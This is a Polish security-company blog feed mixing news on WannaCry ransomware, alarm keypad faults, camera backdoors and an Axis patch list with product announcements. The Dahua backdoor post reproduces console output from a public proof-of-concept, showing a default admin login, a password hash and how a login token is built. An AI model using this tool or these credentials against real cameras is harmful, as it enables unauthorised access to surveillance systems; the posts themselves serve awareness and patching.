W piątek, 12 maja zaobserwowano pierwszy przypadki zaszyfrowania maszyn nie posiadających stosownych aktualizacji łatających lukę MS17-010 w SMBv1. Zgłoszono ponad 50 tyś zaszyfrowanych maszyn w 74 krajach w ciągu jednego dnia. Informację jako pierwszy ogłosił m.in. Kaspersky, chwilę po nich Avast. Sporo nowych informacji można znaleźć pod tagiem #wanacry – tak się nazywa to ransomware. Podatne w większości przypadków są maszyny bez aktualizacji wydanych przez Microsoft w marcu tego roku, oraz systemy oparte na Windowsie XP i innych systemach bez wsparcia w postaci aktualizacji (choć nie jest to regułą). Na chwilę obecna dokładne źródło infekcji nie jest znane, znana jest tylko wykorzystana metoda infekcji. Pojawiają się już pierwsze metody ochrony przed nią w tym specjalne dodatkowe aktualizacje wypuszczone przez Microsoft. Sugerujemy wykonanie backupu danych na zewnętrzne nośniki, i zainstalowanie niezbędnych aktualizacji, oraz jeśli korzystanie z SMB nie jest konieczne wyłączenie usługi do czasu pojawienia się większej ilości informacji – opis wyłączenia usługi SMB dostępy jest na stronach firmy Microsoft. Ransomware szyfruje dokumenty ofiary, obrazy, muzykę i inne pliki, dane można odzyskać jedynie jeśli ofiara zapłaci za klucz, aby je odszyfrować – nie warto więc ryzykować pozostawiając maszyny nie zabezpieczone.

Równocześnie informujemy klientów naszego działu IT, że będące pod naszą zdalną opieką maszyny zostały niezwłocznie w nocy z 12/13 załatane wszystkimi dostępnymi poprawkami. Śledzimy rozwój sytuacji i będziemy na bieżąco informować jeśli będą potrzebne kolejne kroki.

VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)
VN:F [1.9.22_1171]
Opublikowany w Inteligentny dom, Telekomunikacja | Otagowany , , , , , | Możliwość komentowania Microsoft wydaje specjalną poprawkę w związku z ransomware WannaCrypt, WanaDecrypt i WannaCry dla systemu Windows 8, XP i Windows Server 2003 została wyłączona

Co robić gdy manipulator od alarmu sygnalizuje problem ? Awarie i usterki na klawiaturze od alarmu od których zależy nasze bezpieczeństwo.

VN:F [1.9.22_1171]
VN:F [1.9.22_1171]
Rating: 4.0/5 (3 votes cast)

Pomarańczowa lampka AWARIA lub czerwona kontrolka TBL, TRBL, Fault i cykliczne „pikanie” klawiatury to najczęstsze zdarzenia zgłaszane przez bardziej uważnych użytkowników systemów alarmowych – zdarzenia które często są bagatelizowane i lekceważone … do czasu …

Już dawno na ramach naszego bloga nie pojawiła się podobna publikacja – dedykowana raczej dla typowego początkującego użytkownika końcowego niż instalatora, nie mniej jednak może ona być dla Was cenna w sytuacji gdy na Waszej klawiaturze od alarmu zaświeci się wspomniana lampka lub klawiatura zacznie wydawać podejrzane dźwięki w wyniku których być może właśnie czytasz/czytacie tą publikację.

Awarie .. brzmi groźnie i faktycznie mogą być groźne. Absolutnie nie wolno ich lekceważyć i należy w przypadku każdej z nich weryfikować jej przyczynę zanim okaże się, że nasz system nie zadziałał. Jak sprawdzić z czym jest związana awaria występująca w naszym systemie ? Po pierwsze skorzystać z instrukcji obsługi użytkownika w której będzie opisana procedura jej sprawdzenia – w zależności od producenta czy modelu centrali procedura ta jak i interpretacja tego co wyświetla klawiatura LED/LCD będzie różna więc instrukcja to podstawa. Co jeśli jej nie mamy lub nie znamy modelu centrali ? Tu z pomocą przyjdzie nam instalator lub materiały zebrane np. na naszej stronie w dziale w którym znajdują się instrukcje obsługi do alarmów różnych producentów. Z jakiego typu awariami możemy się spotkać w najbardziej typowych sytuacjach – spróbujmy wymienić te najczęstsze i najbardziej typowe dla domowych systemów alarmowych:

 

Awaria zasilania sieciowego – najczęstsza z uwagi na czasowe wyłączenia energii elektrycznej przez zakład energetyczny, ale i też jedna z tych na którą szczególnie powinniśmy zwracać uwagę. Brak zasilania sieciowego oznacza bowiem, że nasz system pracuje na zasilaniu awaryjnym z akumulatora (lub grupy akumulatorów w przypadku bardziej złożonych instalacji). Jak  wiemy każdy akumulator ma swoją pojemność, a każdy system swój pobór mocy wynikający z ilości i typu elementów w systemie oraz trybu jego pracy (standby, dozór, alarm). Jeśli znamy obydwa parametry (pojemność akumulatorów i pobór prądu) możemy oszacować (np. kalkulatorem służącym do doboru pojemności akumulatora, a w drugą stronę liczącym czas działania alarmu) czas jaki nasz system powinien działać bez zasilania sieciowego. Ta informacja pozwoli nam oszacować czy możemy sobie np. pozwolić na wyjście z domu gdy nasz system nie jest zasilany np. w wyniku ogłoszonej wcześniej 2h przerwy w dostawie energii. Oczywiście w większości przypadków w zależności od tego jak system został zaprogramowany może się okazać, że nasz system nie da się uzbroić bez przywrócenia zasilania. Awaria zasilania sieciowego z punktu widzenia bezpieczeństwa jest jedną z ważniejszych – bo tak naprawdę od czas działania systemu bez zasilania zależy bezpieczeństwo naszego mienia. Przyczynami zaniku zasilania poza tymi oficjalnymi i ogłaszanymi mogą być również uszkodzenia transformatora, bezpieczników, zły kontakt przewodów lub celowe zamierzone działanie np. włamywacza. Co zrobić w sytuacji tego typu awarii ? Przede wszystkim zweryfikować ew. przyczynę, a jeśli nie jesteśmy w stanie jej ustalić – skontaktować się z instalatorem lub serwisem zajmującym się obsługą systemów alarmowych.

Awaria akumulatora – każdy akumulator ma swoją żywotność deklarowaną przez producenta (wynoszącą średnio od 2-12 lat), jest również klasyfikowany zgodnie z wytycznymi EuroBat (The Association of European Automotive and Industrial Battery Manufacturers) i w zależności od klasyfikacji możemy mniej więcej przewidzieć okres kiedy może ulec uszkodzeniu. Serii akumulatorów jest wiele i każda ma swój obszar zastosowania, jednak najczęstszy podział to właśnie podział ze względu na żywotność (tak chociażby są podzielone akumulatory dostępne w naszej ofercie B2B). Niestety zdarzają się sytuacje w których akumulator może ulec usterce szybciej (np. w wyniku zbyt głębokiego rozładowania poniżej ~10.5V, przed którym mogą uchronić dodatkowe moduły chroniące przed zbyt głębokim rozładowaniem, czy elektroniczne układy zintegrowane z elektroniką zasilaczy). Akumulator może uszkodzić się również w wyniku pracy w niekorzystnych warunkach lub uszkodzeń przez nie spowodowanych (zbyt wiele cykli rozładowania/ładowania lub niewłaściwe parametry ładowania) – np. w wyniku uszkodzenia elektroniki płyty głównej lub braku odpowiedniej wydajności zasilacza – spowodowanej złym zaprojektowaniem systemu przez instalatora w wyniku którego akumulator jest ciągle nie doładowany. Istotna na okres eksploatacji  jest również niewłaściwa temperatura pracy o której często zapominają właściciele słabo wentylowanych pomieszczeń. Awaria akumulatora jest równie istotna jak awaria zasilania sieciowego i w pewnych przypadkach może doprowadzić o uszkodzenia elektroniki zasilaczy lub płyty głównej, dlatego nie należy jej bagatelizować. Jest również bardzo ważna z punktu widzenia bezpieczeństwa ponieważ może być sygnalizowana np. przez uszkodzony rozszczelniony akumulator, akumulator z wypalonymi lub skorodowanymi zaciskami które nie były odpowiednio konserwowane, albo uległy uszkodzeniu w wyniku nadmiernego obciążenia – są to często sytuacje losowe, wynikające z wadliwej partii akumulatorów lub ich uszkodzenia w trakcie dokręcania zacisków z niewłaściwym momentem obrotowym, podczas którego mogą zostać rozszczelnione. Z tego powodu właściwą eksploatacje lepiej powierzyć fachowcom a nie brać za nią samodzielnie z przekonaniem że to przecież tylko „podłączenie dwóch kabelków” – nie jeden instalator zapewne usłyszał bardzo popularne wśród użytkowników systemów alarmowych sformułowanie „czy ten akumulator, i ta usługa są ze złota ?” Przestrzegamy przed tego typu podejściem i oszczędzaniem na akumulatorach które w naszej ocenie są jednymi z najważniejszych zaraz po okablowaniu elementami systemu alarmowego.

Co robić gdy mamy usterkę akumulatora ? Jeśli posiadamy możliwości i wiedzę alby skontrolować / wymienić akumulator powinniśmy zrobić to jak najszybciej. Jeśli nie należy skontaktować się instalatorem i poprosić o jego pomoc. Kontakt z instalatorem będzie w tym wypadku najbardziej rozsądnym rozwiązaniem, ponieważ będzie on dysponował wiedzą zarówno na temat parametrów technicznych akumulatorów możliwych do zastosowania w naszym systemie, jak i potrzebne narzędzia pozwalające przeprowadzić test ich pracy i sprawności po wymianie, a także regularnie kontrolować ich stan również na odległość w przypadku zdalnej obsługi technicznej.

 

 

 

 

Utrata ustawień zegara – awaria daty i czasu – jedna z najbardziej typowych usterek pojawiających się po długich zanikach zasilania przekraczających czas pracy awaryjnej. Może świadczyć również o usterce baterii RTC na płycie głównej. W większości systemów prosta do usunięcia z poziomu użytkownika poprzez menu ustawień zegara gdzie można ustawić właściwy czas. Gorzej jeśli jest to usterka zegara RTC lub brak synchronizacji z serwerem czasu zdefiniowanym przez instalatora. Czas dla systemu jest bardzo ważny – ponieważ pozwala zarówno instalatorowi jak i użytkownikowi analizować kolejność zdarzeń jakie miały miejsce w systemie lub po włamaniu.

Lista innych awarii jakie mogą wystąpić jest długa …. moglibyśmy o nich pisać i pisać, ale i tak w 80% przypadków będzie potrzebna wizyta technika (szczególnie w przypadku tych podczas których pojawiają się komunikaty sabotaż lub wezwij serwis), dlatego skupiliśmy się na 3 najbardziej popularnych. Życzymy wam bezawaryjnej pracy waszych systemów, ale pamiętajcie, że nie są to systemy bezobsługowe i wymagają one regularnego nadzoru i obsługi aby mogły przez jak najdłuższy okres zachować sprawność. Jeśli macie problem z waszym systemem alarmowych zachęcamy do kontaktu.

VN:F [1.9.22_1171]
Rating: 4.0/5 (3 votes cast)
VN:F [1.9.22_1171]
Opublikowany w Alarmy | Otagowany , , , , , , , , , | Możliwość komentowania Co robić gdy manipulator od alarmu sygnalizuje problem ? Awarie i usterki na klawiaturze od alarmu od których zależy nasze bezpieczeństwo. została wyłączona

Kolejny backdoor w urządzeniach Dahua częściowo załatany, ale co z innymi IoT i urządzeniami innych popularnych marek jak Hikvision, DNR, BCS które wciąż są podatne na ataki ?

VN:F [1.9.22_1171]
VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)

Zaledwie kilka dni temu po świecie niezależnych badaczy bezpieczeństwa IoT rozeszła się niepokojąca informacja o odkryciu kolejnego backdoora dotyczącego kamer i rejestratorów Dahua podłączonych do Internetu produkowanych przez Dahua Technologies. Backdoor został odkryty przez użytkownika grupy Seclist o nicku Bashis który w swojej publikacji Dahua backdoor proof-of-concept  twierdził, że napisany prze niego kod dahua-backdoor.py wykorzystujący wspomnianą lukę umożliwia zdalne  penetrowanie urządzeń i baz danych zawierających poświadczenia użytkowników i hashe haseł.

$ ./dahua-backdoor.py --rhost 192.168.5.2

[*] [Dahua backdoor Generation 2 & 3 (2017 bashis <mcw noemail eu>)]

[i] Remote target IP: 192.168.5.2
[i] Remote target PORT: 80
[>] Checking for backdoor version
[<] 200 OK
[!] Generation 2 found
[i] Chosing Admin Login: 888888, PWD hash: 4WzwxXxM
[>] Requesting our session ID
[<] 200 OK
[>] Logging in
[<] 200 OK
{ "id" : 10000, "params" : null, "result" : true, "session" : 100385023 }

[>] Logging out
[<] 200 OK

[*] All done...
$

$ ./dahua-backdoor.py --rhost 192.168.5.3

[*] [Dahua backdoor Generation 2 & 3 (2017 bashis <mcw noemail eu>)]

[i] Remote target IP: 192.168.5.3
[i] Remote target PORT: 80
[>] Checking for backdoor version
[<] 200 OK
[!] Generation 3 Found
[i] Choosing Admin Login: admin, Auth: 27
[>] Requesting our session ID
[<] 200 OK
[i] Downloaded MD5 hash: 94DB0778856B11C0D0F5455CCC0CE074
[i] Random value to encrypt with: 1958557123
[i] Built password: admin:1958557123:94DB0778856B11C0D0F5455CCC0CE074
[i] MD5 generated password: 2A5F4F7E1BB6F0EA6381E4595651A79E
[>] Logging in
[<] 200 OK
{ "id" : 10000, "params" : null, "result" : true, "session" : 1175887285 }

[>] Logging out
[<] 200 OK

[*] All done...
$

[ETX]

Badacz „Bashis” twierdzi, że firma Dahua „poprosiła” go o usunięcie opublikowanego dowodu, nie zgodził się jednak ponieważ stwierdził, że jest to wystarczające uzasadnienie na istnienie pełnoprawnego backdoora o którym firma wiedziała, jednocześnie dając jej 30 dni na pozbycie się tylnej furtki.

Niezależny badacz bezpieczeństwa Graham Cluley wkrótce po tym udostępnił swój proof-of-concept który również poświadczył możliwość zautomatyzowania ataków na kamery IP oraz rejestratory wyprodukowane przez Dahua Technology. Informacja ta została również szybko zweryfikowana w związku z oficjalnym komunikatem firmy Dahua podanym do publicznej wiadomości. Z oficjalnym komunikatem oraz biuletynem bezpieczeństwa można zapoznać się tutaj: Dahua Technology Vulnerability oraz tutaj : Dahua Security Bulletin 030617 Jeśli producent nie poczyni w zakresie publikacji żadnych kroków kod źródłowy exploita zostanie udostępniony 5 kwietnia do wiadomości publicznej.

Wg. oficjalnej opublikowanej listy podatność na pewno dotyczy m.in modeli:
DH-IPC-HDW23A0RN-ZS
DH-IPC-HDBW23A0RN-ZS
DH-IPC-HDBW13A0SN
DH-IPC-HDW13A0SN
DH-IPC-HFW13A0SN-W
DH-IPC-HDBW13A0SN
DH-IPC-HDW13A0SN
DH-IPC-HFW13A0SN-W
DHI-HCVR51A04HE-S3
DHI-HCVR51A08HE-S3
DHI-HCVR58A32S-S2

Nie jest to pierwsza wpadka firmy Dahua, poprzednia dotyczyła Dahua DVR Authentication Bypass – CVE-2013-6117 która w Polsce dotyczyła w szczególniej mierze bardzo popularnych z uwagi na niskie ceny urządzeń marki BCS. Co ciekawe główny importer tej marki w Polsce dopiero nie dawno opublikował na swojej stronie zestaw narzędzi pozwalających wyczyścić zainfekowane urządzenia z malware wykorzystującego tą lukę – zestaw narzędzi BCS Repair Tool można pobrać również z naszego supportu.

W podobnym czasie na innej grupie Ipcamtalk pojawiła się kolejna informacja tym razem od innego użytkownika o nicku Montcrypto o backdorach w urządzeniach HIKVision – w przypadku nie podjęcia działań przez ww. firmę szczegóły dotyczące backdora zostaną opublikowane 20 marca. W przypadku tych urządzeń jest to już kolejny istoty backdoor zaraz po tym który dotyczył botnetu Mirai którego kod źródłowy Mirai wkrótce po ujawnieniu botnetu został opublikowany w sieci. Dotyczy to również OEMowych partnerów HiKVision korzystających z rozwiązań programowych tej firmy.

Najbardziej niepokojące w tym wszystkim jest to, że wciąż istnieje wiele urządzeń wspomnianych marek, i wielu innych których firmware wciąż nie został załatany.  Z własnych obserwacji i zgłoszeń od naszych klientów widzimy, że zjawisko infekcji IoT narasta i staje się coraz bardziej realnym problemem i zagrożeniem, niestety świadomość firm i osób instalujących te urządzenia które niejednokrotnie nie posiadają stosownej wiedzy nt. infrastruktury IT i jej zabezpieczeń umożliwia przeprowadzanie ataków i infekcji obejmujących obszar urządzeń CCTV Security i IoT.

VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)
VN:F [1.9.22_1171]
Opublikowany w Inteligentny dom, Monitoring, Monitoring wizyjny, Systemy telewizji dozorowej, Telekomunikacja | Otagowany , , , , , , , , , , , , | Możliwość komentowania Kolejny backdoor w urządzeniach Dahua częściowo załatany, ale co z innymi IoT i urządzeniami innych popularnych marek jak Hikvision, DNR, BCS które wciąż są podatne na ataki ? została wyłączona

Ransomware zamyka gościom dostęp do pokoi hotelowych

VN:F [1.9.22_1171]
VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)

Systemy hotelowe to również nowoczesne rozwiązania chroniące bezpieczeństwo dostępu do pokoi hotelowych, i choć nie należą do tak popularnie atakowanych w ostatnim okresie rozwiązań IoT – niestety jak pokazują najnowsze doniesienia również i one mogą stać się celem spersonalizowanego ataku.

W jednym z austriackich hoteli, kadra zarządzająca po ostatnich „przygodach” ze swoim systemem dostępu do pokoi hotelowych rozważa powrót do tradycyjnych zamków. Stało się to, po tym jak ich nowoczesny system elektronicznego klucza został zablokowany przez hakerów żądających okupu w zamian za to, aby goście mogli swobodnie korzystać z dostępu do swoich pokoi. Jak donosi magazyn austriackiej branży hotelarskiej Allgemeine Hotel-und-Gastronomie-Zeitung jeden z lokalnych hoteli, był ofiarą co najmniej kilku ataków hakerów. Hackerzy zażądali okupu w kryptowalucie bitcoin’s (równowartości 1,500 EUR) w zamian za dostarczenie kluczy deszyfrowania. Większość tego typu systemów posiada mechanizm fail-safe pozwalający na otwarcie drzwi w przypadku awarii zasilania, niestety po jego użyciu system traci zdolność ponownego zamknięcia co może stanowić istotny problem dla gości hotelowych. Pomimo znacznych nakładów na zabezpieczenie infrastruktury IT atak powtórzył się kilkukrotnie co zmusiło kierownictwo hotelu do rozważenia sensowności wymiany zamknięć na klasyczne mechaniczne zamki.

Jeśli masz zamiar jeździć na nartach w Austrii, to może lepiej rozważ wyjazd na narty do Polski, gdzie tego typu systemy z uwagi na swoją cenę nie są aktualnie aż tak popularne, lub przygotuj się na ewentualne niespodzianki … Jeśli jesteś managerem hotelu to nie przejmuj się, bo na szczęście istnieją również systemy które z uwagi na sposób i technologię współpracy urządzeń są znacznie bezpieczniejsze pod względem tego typu ataków – jednym z takich rozwiązań jest oferowany przez nas system blueSmart – system elektronicznej kontroli dostępu przy wykorzystaniu elektronicznego klucza.

VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)
VN:F [1.9.22_1171]
Opublikowany w Kontrola dostępu | Otagowany , | Możliwość komentowania Ransomware zamyka gościom dostęp do pokoi hotelowych została wyłączona

Aplikacja mobilna Sorex Manager do obsługi czytników bluetooth Sorex Door Phone & Code umożliwiających otwieranie drzwi przy użyciu telefonu

VN:F [1.9.22_1171]
VN:F [1.9.22_1171]
Rating: 4.0/5 (1 vote cast)

Użytkowników produktów Sorex’a, informujemy o nowej bezpłatnej aplikacji Sorex Manager na Android (w Google Play), w Windows Store i iPhone (na iTunes) która znacznie ułatwia zarządzanie produktami Sorex Door Phone & Code.

Obydwie oferują szereg funkcji znacznie ułatwiających obsługę urządzeń Sorex’a
– Zarządzanie użytkownikami
– Blokowanie użytkowników
– Włącz / Wyłącz funkcję dotykowej obsługi
– Ustawienie zasięgu działania
– Zarządzanie kodem klucza
– Zmiana ustawień podświetlenia / sygnalizacji

Nowa aplikacja obsługuje również najnowsze designer’skie wersje Door Phone & Code wyposażone w szklany dotykowy panel sensoryczny, w dwóch wersjach kolorystycznych (czarnej i srebrnej).

Czytnik bluetooth do integracji z telefonem komórkowym przez bluetooth + szyfrator (czarny szkło)DO401000_black

[DO401000 black]
Index: [26997.948.16686]

Czytnik bluetooth do integracji z telefonem komórkowym przez bluetooth + szyfrator (srebrny szkło)

DO401000_silver

[DO401000 silver]
Index: [26999.566.16687]

 

Wcześniejszą alternatywą była aplikacja KFVkeyless która jest produktem KFV Karl Fliether GmbH & Co KG, firmy SIEGENIA GROUP

Poniżej kilka przykładowych screenów z obydwu aplikacji:

KFVkeyless

KFVkeyless_5 KFVkeyless_4 KFVkeyless_3 KFVkeyless_2 KFVkeyless_1

 

 

 

 

 

 

 

 

 

 

 

 

 

Sorex Manager

Sorex_Manager_1 Sorex_manager_2 Sorex_manager_3 Sorex_manager_4 Sorex_manager_5 Sorex_manager_6

 

 

 

 

 

 

 

Zachęcamy do testów i dzielenia się opiniami.

VN:F [1.9.22_1171]
Rating: 4.0/5 (1 vote cast)
VN:F [1.9.22_1171]
Opublikowany w Kontrola dostępu | Otagowany , , , | Możliwość komentowania Aplikacja mobilna Sorex Manager do obsługi czytników bluetooth Sorex Door Phone & Code umożliwiających otwieranie drzwi przy użyciu telefonu została wyłączona

Axis opublikował aktualizacje serwisowe dla krytycznej luki w zabezpieczeniach

VN:F [1.9.22_1171]
VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)

security-79397_1920Firma Axis w swoim biuletynie z 29 czerwca opublikowała aktualizacje serwisowe dla sporej grupy niżej wymienionych produktów, których dotyczy dość poważny problem związany z odkryciem krytycznej luki bezpieczeństwa. Luki na tyle krytycznej, że póki co nie będzie ona ujawniona, zapewne w związku z nadzieją, że w chwili obecnej jest ona znana wyłącznie niezależnemu odkrywcy, który ją odkrył. Do publicznej wiadomości informacja nt. luki ma się dostać 18 lipca. Oczywiście, nie ma gwarancji, że nie została ona wykryta wcześniej przez kogoś innego, dlatego z uwagi na realne ryzyko przejęcia kontroli nad sporą grupą kamer Axis, nie radzimy czekać do aktualizacji. Źródłem problemu jest prawdopodobnie fragment kodu znajdujący się w firmware od 5.20.x wzwyż do wersji 6.30 (urządzenia dystrybuowane od 2010 roku.)
 
Firma Axis udostępni raport CVE pod adresem www.axis.com/support/product-security.

To już któraś z kolei podatność wykryta w serii urządzeń Axis. Do wcześniejszych należały m.in.

W związku z ryzykiem włamania do urządzeń zaleca się użytkownikom końcowym, aby jak najszybciej zaktualizowali te produkty, zwłaszcza jeśli możliwy jest do nich dostęp przez Internet. Lista jest długa i obejmuje szereg popularnych modeli urządzeń :

Products		Service Releases
========		================
A1001			1.45.0
A8004-VE		5.85.1.2
A8105-E			1.58.2.1
A9188			1.00.0.1
C3003-E			1.20.2
M1004-W			5.50.5.6
M1011			5.20.2
M1011-W			5.20.3
M1013			5.50.5.6
M1014			5.50.5.6
M1025			5.50.5.6
M1031-W			5.20.4
M1033-W			5.50.5.6
M1034-W			5.50.5.6
M1054			5.50.3.6
M1103			5.50.3.2
M1104			5.50.3.2
M1113			5.50.3.2
M1114			5.50.3.2
M1143-L			5.60.1.6
M1144-L			5.60.1.6
M1145			5.90.1.1
M1145-L			5.90.1.1
M2014-E			5.50.7
M3004-V			5.50.5.6
M3005-V			5.50.5.6
M3011			5.21.1
M3014			5.40.9.7
M3024-LVE		5.50.5.6
M3025-VE		5.50.5.6
M3037			5.75.1.2
M3113-R			5.40.9.7
M3113-VE		5.40.9.7
M3114-R			5.40.9.7
M3114-VE		5.40.9.7
M3203			5.50.3.2
M3204 			5.50.3.2
M5013 			5.50.3.3
M5014 			5.50.3.3
M7001			5.20.4
M7010			5.50.4.3
M7011 			5.90.1.1
M7014 			5.50.4.3
M7016 			5.51.2.4
P1204			5.50.7
P1214			5.50.7
P1214-E			5.50.7
P1224-E			5.50.7
P1311			5.20.1
P1343 			5.40.9.9
P1344 			5.40.9.9
P1346 			5.40.9.7
P1347 			5.40.9.7
P1353 			5.90.1.2
P1354			5.90.1.2
P1355 			5.60.1.6
P1357 			5.90.1.2
P1405-E 		5.80.1.2
P1405-LE 		5.80.1.2
P1425-E 		5.80.1.2
P1425-LE		5.80.1.2
P1427-E			5.80.1.2
P1427-LE		5.80.1.2
P1428-E			5.80.1.3
P3214 			6.10.1.2
P3215 			6.10.1.2
P3301 			5.40.9.5
P3304 			5.40.9.5
P3343 			5.40.9.9
P3344 			5.40.9.9
P3346 			5.50.3.3
P3353 			6.10.1.2
P3354 			6.10.1.2
P3363 			5.60.1.6
P3364 			6.10.1.2
P3365 			6.10.1.1
P3367 			6.10.1.2
P3384 			6.10.1.1
P3904-R 		5.80.1.2
P3905-R 		5.80.1.2
P3915-R 		5.80.1.2
P5414-E 		5.90.1.1
P5415-E 		5.90.1.1
P5512 			5.50.4.3
P5512-E 		5.50.4.3
P5514 			6.20.1.2
P5514-E 		6.20.1.2
P5515 			6.20.1.2
P5515-E 		6.20.1.2
P5522 			5.50.4.4
P5522-E 		5.50.4.3
P5532 			5.41.3.2
P5532-E 		5.41.3.2
P5534 			5.40.9.6
P5534-E 		5.40.9.7
P5624-E 		6.20.1.3
P5635-E 		6.20.1.3
P7216			5.51.2.3
P8524			5.50.7
Q1602			5.60.1.6
Q1604			5.90.1.2
Q1614			5.90.1.2
Q1755			5.50.4.2
Q1765-LE PT		5.90.1.4
Q1765-LE		5.90.1.4
Q1775			6.20.1.2
Q1910			5.50.4.2
Q1921			5.50.4.2
Q1922			5.50.4.2
Q1931-E			5.75.1.4
Q1931-E-PT		5.75.1.3
Q1932-E			5.75.1.4
Q1932-E-PT		5.75.1.2
Q3708			5.95.4.1
Q3709			5.75.1.4
Q6000-E			5.95.3.1
Q6032			5.41.1.3
Q6032-E			5.41.1.5
Q6034			5.41.1.2
Q6034-E			5.41.1.4
Q6035			5.41.1.3
Q6035-E			5.41.1.6
Q6042			5.70.1.2
Q6042-C			5.70.1.2
Q6042-E			5.70.1.4
Q6042-S			5.70.1.2
Q6044			5.70.1.3
Q6044-C			5.70.1.2
Q6044-E			5.70.1.4
Q6044-S			5.70.1.2
Q6045			5.70.1.3
Q6045-C			5.70.1.2
Q6045-C-MkII		5.70.1.2
Q6045-E			5.70.1.4
Q6045-E-MKII		5.70.1.5
Q6045-MKII		5.70.1.4
Q6045-S			5.70.1.2
Q6045-S-MKII		5.70.1.2
Q6114-E			6.20.1.4
Q6115-E			6.20.1.3
Q6128-E			5.85.2.3
Q7401			5.50.4.2
Q7404			5.50.4.3
Q7406			5.51.2.2
Q7414			5.51.2.2
Q7411			5.90.1.1
Q7424-R			5.50.4.2
Q7424-R	 MkII		5.51.3.1
Q8414-LVS		6.10.1.1
Q8631-E			5.75.1.2
Q8632-E			5.75.1.2
Q8665-E			5.90.1.2
Q8665-LE		5.90.1.2
V5914			5.75.1.3
V5915			5.75.1.3

Na chwilę obecną istnieje również sporo lista urządzeń bez gotowej poprawki (w trakcie opracowania).

Products that will be updated soon:
===================================
Q7436	
F34			
F41 			
F44 			
M1124	
M1125	
M3007	
M3027-PVE	
P1364	
P1365	
P1435-E	
P1435-LE	
Q1615	
Q1635	
M3006-V	
M3026-VE	
P3224-LV
P3224-LVE
P3225-LV
P3225-LVE
Q3505-V
Q3505-VE
Q2901-E
Q2901-E_PT_Mount
F44-DUAL
P12-MKII
P1365-MKII
P3707-PE
P5544
P7214
P7224
Q1755-PT
Q6032-C
Q6034-C
Q6035-C
VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)
VN:F [1.9.22_1171]
Opublikowany w Alarmy | Otagowany , | 1 komentarz

DS-2DP16362-D z nowej serii produktów Hikvision PanoVu – kamera panoramiczna i obrotowa PTZ w jednym

VN:F [1.9.22_1171]
VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)

W ofercie Hikvision pojawiła się nowa seria kamer – PanoVu, reprezentująca modele łączące cechy kamer panoramicznych i obrotowych PTZ. Jednym z reprezentantów tej serii jest DS-2DP1636Z-D. Kamera ta posiada 360° panoramiczny, szczegółowy obraz z pozycjonowaniem 3D. Obiektyw wyposażony jest w osiem sensorów Dark Fighter, dzięki czemu można uzyskać precyzyjne ujęcia z dużych odległości. Wysoka rozdzielczość w postaci 16 megapixeli, a także 36x optyczny zoom pozwalają na nagrywanie w doskonałej jakości. Dodatkowo kamera charakteryzuje się wachlarzem funkcji Smart Ip: wykrycie intruza, detekcja przekroczenia linii, czy naruszenie strefy. Urządzenie najlepiej sprawdza się na rozległych terenach, gdzie wymagany jest nacisk na detale w obserwacjach, np. na lotniskach, placach, dworcach i stadionach.
DS-2DP1636Z-D
Zapraszamy do zapoznania się ze szczegółową specyfikacją PanoVu DS-2DP1636Z-D na naszej platformie B2B.

VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)
VN:F [1.9.22_1171]
Opublikowany w Monitoring wizyjny, Systemy telewizji dozorowej | Otagowany , , , , , , | Możliwość komentowania DS-2DP16362-D z nowej serii produktów Hikvision PanoVu – kamera panoramiczna i obrotowa PTZ w jednym została wyłączona

Konica-Minolta nabywa udziały firmy Mobotix

VN:F [1.9.22_1171]
VN:F [1.9.22_1171]
Rating: 0.0/5 (0 votes cast)

mobotixKluczowy gracz na rynku, firma Konica Minolta będąca dostawcą urządzeń biurowych i systemów optycznych, podpisała umowę na zakup 65 procent udziałów firmy Mobotix AG. Firma Mobotix (założyciel Ralf Hinkel) dzięki nowemu kontraktowi udostępni własną technologię w celu opracowania nowoczesnych rozwiązań bezpieczeństwa „Next Generation Network”.

Mobotix z siedzibą i produkcją w Langmeil w Niemczech, zarobił w ubiegłym roku około 90 mln $. Założona w 1999 roku firma zatrudnia około 400 pracowników i posiada biura w Nowym Jorku, Madrycie, Hiszpanii, Paryżu, Tokio i w Sydney.  Połączenie z firmą Konica Minolta która zatrudnia ponad 41 tyś. pracowników i prowadzi działalność w 150 krajach może stanowić bardzo ciekawe połączenie wiedzy i doświadczenia. Dodatkowym atutem dla Mobotix’a będzie niewątpliwie rozbudowana globalna sieć sprzedaży firmy Konica Minolta która może znacząco wpłynąć na rzecz zwiększenia sprzedaży dla Mobotix’a.

Co z tego połączenie wyniknie, czas pokaże. Jedno jest jednak pewne – rozwiązania MOBOTIX, są i będą jednym z najciekawszych rozwiązań w naszej ofercie.

Oficjalne źródło informacji:
http://www.konicaminolta.com/about/releases/2016/0329_01_01.html
https://www.mobotix.com/other/Company/News/News-2016/Konica-Minolta-Inc.-acquires-share-package

VN:F [1.9.22_1171]
Rating: 0.0/5 (0 votes cast)
VN:F [1.9.22_1171]
Opublikowany w Monitoring wizyjny, Systemy telewizji dozorowej | Otagowany | Możliwość komentowania Konica-Minolta nabywa udziały firmy Mobotix została wyłączona

IPC-EB81200, czyli nowe wysoko-rozdzielcze kamery IP klasy premium wyposażone w 12-megapixelowy przetwornik

VN:F [1.9.22_1171]
VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)

ipc-eb81200Wśród panoramicznych kamer IP pojawiła się nowa kamera marki Dahua wyposażona w obiektyw typu FishEye określany przez producenta jako 360 Panorama IP oraz 12-megapixelowy przetwornik.

Firma Dahua wyposażyła swoje kamery w kilka różnych modeli przetworników obrazu. Wysoko-rozdzielcze kamery z klasy premium wyposażono w 12-megapixelowy przetwornik – model IPC-EB81200, natomiast w 5-cio i 4-ro megapixelowe przetworniki uzbrojono kamery z klasy ekonomicznej z serii IPC-EBW81200/8600.

Prezentacja video:

źródło : https://www.youtube.com/watch?v=QbrGPnrWSYg

